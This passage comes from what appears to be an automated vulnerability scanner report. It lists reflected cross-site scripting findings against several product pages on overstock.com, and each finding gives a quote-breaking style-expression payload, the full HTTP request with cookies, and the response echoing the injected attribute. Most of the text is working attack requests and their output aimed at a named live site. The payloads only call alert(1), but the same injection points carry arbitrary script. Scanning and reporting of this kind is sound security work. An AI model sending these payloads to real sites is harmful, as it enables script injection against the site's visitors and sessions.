The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e14"style%3d"x%3aexpression(alert(1))"e71b691998e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80e14"style="x:expression(alert(1))"e71b691998e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html?TID=R:A1_1&80e14"style%3d"x%3aexpression(alert(1))"e71b691998e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:41:02 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:41:02 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5213639|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:41:02 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:41:02 GMT; Path=/
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 128473

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="80e14"style="x:expression(alert(1))"e71b691998e" value="1"/>
...[SNIP]...

1.6. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [IID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The value of the IID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2297"style%3d"x%3aexpression(alert(1))"1c26c1c49bb was submitted in the IID parameter. This input was echoed as e2297"style="x:expression(alert(1))"1c26c1c49bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?IID=prod4068266e2297"style%3d"x%3aexpression(alert(1))"1c26c1c49bb&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:38:25 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:38:25 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:38:25 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:38:25 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 129713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="iid" value="prod4068266e2297"style="x:expression(alert(1))"1c26c1c49bb"/>
...[SNIP]...

1.7. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [TID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The value of the TID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee4c5"style%3d"x%3aexpression(alert(1))"a6f2c5b6860 was submitted in the TID parameter. This input was echoed as ee4c5"style="x:expression(alert(1))"a6f2c5b6860 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?TID=R:A2_1ee4c5"style%3d"x%3aexpression(alert(1))"a6f2c5b6860 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:34:46 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:34:47 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:34:47 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:34:47 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 129608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="tid" value="R:A2_1ee4c5"style="x:expression(alert(1))"a6f2c5b6860"/>
...[SNIP]...

1.8. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6c77"style%3d"x%3aexpression(alert(1))"0b5c8f805f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6c77"style="x:expression(alert(1))"0b5c8f805f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?TID=R:A2_1&b6c77"style%3d"x%3aexpression(alert(1))"0b5c8f805f5=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:36:48 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:36:48 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:36:48 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:36:48 GMT; Path=/
Keep-Alive: timeout=5, max=60
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 129680

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="b6c77"style="x:expression(alert(1))"0b5c8f805f5" value="1"/>
...[SNIP]...

1.9. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [sec_iid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The value of the sec_iid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee031"style%3d"x%3aexpression(alert(1))"f9ba03d1904 was submitted in the sec_iid parameter. This input was echoed as ee031"style="x:expression(alert(1))"f9ba03d1904 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?IID=prod4068266&sec_iid=74074ee031"style%3d"x%3aexpression(alert(1))"f9ba03d1904 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:39:34 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:39:34 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:34 GMT; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:34 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 129713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="sec_iid" value="74074ee031"style="x:expression(alert(1))"f9ba03d1904"/>
...[SNIP]...

1.10. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html [IID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

Issue detail

The value of the IID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0749"style%3d"x%3aexpression(alert(1))"9029540d5da was submitted in the IID parameter. This input was echoed as e0749"style="x:expression(alert(1))"9029540d5da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html?IID=prod5203264e0749"style%3d"x%3aexpression(alert(1))"9029540d5da&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:40:10 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:40:10 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5203264|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:10 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="iid" value="prod5203264e0749"style="x:expression(alert(1))"9029540d5da"/>
...[SNIP]...

1.11. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582ee"style%3d"x%3aexpression(alert(1))"dfff4353b9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 582ee"style="x:expression(alert(1))"dfff4353b9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html?582ee"style%3d"x%3aexpression(alert(1))"dfff4353b9e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:39:34 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:39:34 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:34 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5203264|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:34 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120284

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="582ee"style="x:expression(alert(1))"dfff4353b9e" value="1"/>
...[SNIP]...

1.12. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html [sec_iid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

Issue detail

The value of the sec_iid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af0bd"style%3d"x%3aexpression(alert(1))"a83110b1a79 was submitted in the sec_iid parameter. This input was echoed as af0bd"style="x:expression(alert(1))"a83110b1a79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html?IID=prod5203264&sec_iid=74074af0bd"style%3d"x%3aexpression(alert(1))"a83110b1a79 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:41:05 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:41:05 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=5203264|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:41:05 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:41:05 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="sec_iid" value="74074af0bd"style="x:expression(alert(1))"a83110b1a79"/>
...[SNIP]...

1.13. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html [IID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

Issue detail

The value of the IID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4c24"style%3d"x%3aexpression(alert(1))"b33d8b94b5e was submitted in the IID parameter. This input was echoed as c4c24"style="x:expression(alert(1))"b33d8b94b5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html?IID=prod3348501c4c24"style%3d"x%3aexpression(alert(1))"b33d8b94b5e&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:39:37 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:39:37 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
